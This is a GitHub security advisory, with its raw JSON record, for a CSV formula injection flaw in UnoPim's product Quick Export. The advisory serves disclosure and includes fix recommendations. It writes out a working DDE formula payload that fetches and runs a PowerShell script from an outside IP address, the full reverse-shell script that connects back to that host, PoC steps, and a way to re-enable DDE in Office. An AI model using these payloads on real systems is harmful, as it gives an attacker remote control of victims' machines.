ghsa-74rg-6f92-g6wx
Vulnerability from github
Published
2025-08-22 16:50
Modified
2025-08-22 21:09
Severity ?
2.5 (Low) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
Summary
UnoPim has CSV Injection on Quick Export feature
Details

Summary

Description: CSV Injection or Formula Injection is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.

Details

A basic test for CSV Injection is using SUM() to add two numbers or open calc.exe​ using​ command: =cmd|' /C calc'!A0​

The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. Payload:

This is our payload and will be used in the vulnerable field during exploitation =cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypass -File "$env:Temp\shell.ps1"'!A1​

shell.ps1: $client = New-Object System.Net.Sockets.TCPClient('52.172.182.242',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()​

PoC:

  1. Go to any product and click on Edit
  2. Add the above discussed payload in any field that accept text for e.g. Product Number field.
  3. Quick Export -> Select CSV, Open the csv, the formula will get executed during opening.

This could be injected by admin or any user that has privilege to edit products. Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.

Please note that if this is replicated on version starting from Office 2021: Follow these steps: Go to File > Options > Trust Center > Trust Center Settings > External Content​ -> Enable Dynamic Data Exchange Server Launch". This is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.

Platform Details: Replicated this on Office 2021 on Windows 11. POC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3

Impact

When the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker's server and executes it. This creates a reverse shell connection from victim's device to attacker's allowing an attacker to perform any action on the victim's device.

Recommendation:

  • Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).
  • Sanitize the vulnerable field using regex or standard libraries.
  • Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.
Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.3.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "unopim/unopim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55745"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-22T16:50:05Z",
    "nvd_published_at": "2025-08-22T17:15:35Z",
    "severity": "LOW"
  },
  "details": "### Summary\nDescription:\n`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.\n\n### Details\nA basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe\u200b using\u200b\ncommand:\n `=cmd|\u0027 /C calc\u0027!A0\u200b`\n\n\nThe same method can be used to run arbitrary code on the victim\u0027s machine.\nFor example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker\u0027s machine.\n*Payload*:\n\u003e This is our payload and will be used in the vulnerable field during exploitation\n```\n    =cmd|\u0027 /C powershell Invoke-WebRequest\n    \"http://52.172.182.242:7000/shell.ps1\" -OutFile \"$env:Temp\\shell.ps1\";\n    powershell -ExecutionPolicy Bypass -File \"$env:Temp\\shell.ps1\"\u0027!A1\u200b\n```\n\n*shell.ps1*:\n```\n    $client = New-Object System.Net.Sockets.TCPClient(\u002752.172.182.242\u0027,8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex \". { $data } 2\u003e\u00261\" | Out-String ); $sendback2 = $sendback + \u0027PS \u0027 + (pwd).Path + \u0027\u003e \u0027;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\u200b\n```\n\n### PoC:\n\n  1. Go to any product and click on Edit\n  2. Add the above discussed payload in any field that accept text for e.g. Product Number field.\n  3. Quick Export -\u003e Select CSV, Open the csv, the formula will get executed during opening.\n\n\u003e This could be injected by admin or any user that has privilege to edit products.\n\u003e Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.\n\n\nPlease note that if this is replicated on version starting from Office 2021:\nFollow these steps:\nGo to `File \u003e Options \u003e Trust Center \u003e Trust Center Settings \u003e External Content\u200b -\u003e Enable Dynamic Data Exchange Server Launch\"`.\nThis is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.\n\nPlatform Details:\nReplicated this on Office 2021 on Windows 11.\nPOC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3\n\n### Impact\nWhen the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker\u0027s server and executes it. This creates a reverse shell connection from victim\u0027s device to attacker\u0027s allowing an attacker to perform any action on the victim\u0027s device.\n\n### Recommendation:\n- Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).\n- Sanitize the vulnerable field using regex or standard libraries.\n- Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.",
  "id": "GHSA-74rg-6f92-g6wx",
  "modified": "2025-08-22T21:09:43Z",
  "published": "2025-08-22T16:50:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55745"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/commit/8325b78567411ad78d44c0385f192360e608ff71"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34"
    },
    {
      "type": "WEB",
      "url": "https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unopim/unopim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "UnoPim has CSV Injection on Quick Export feature"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.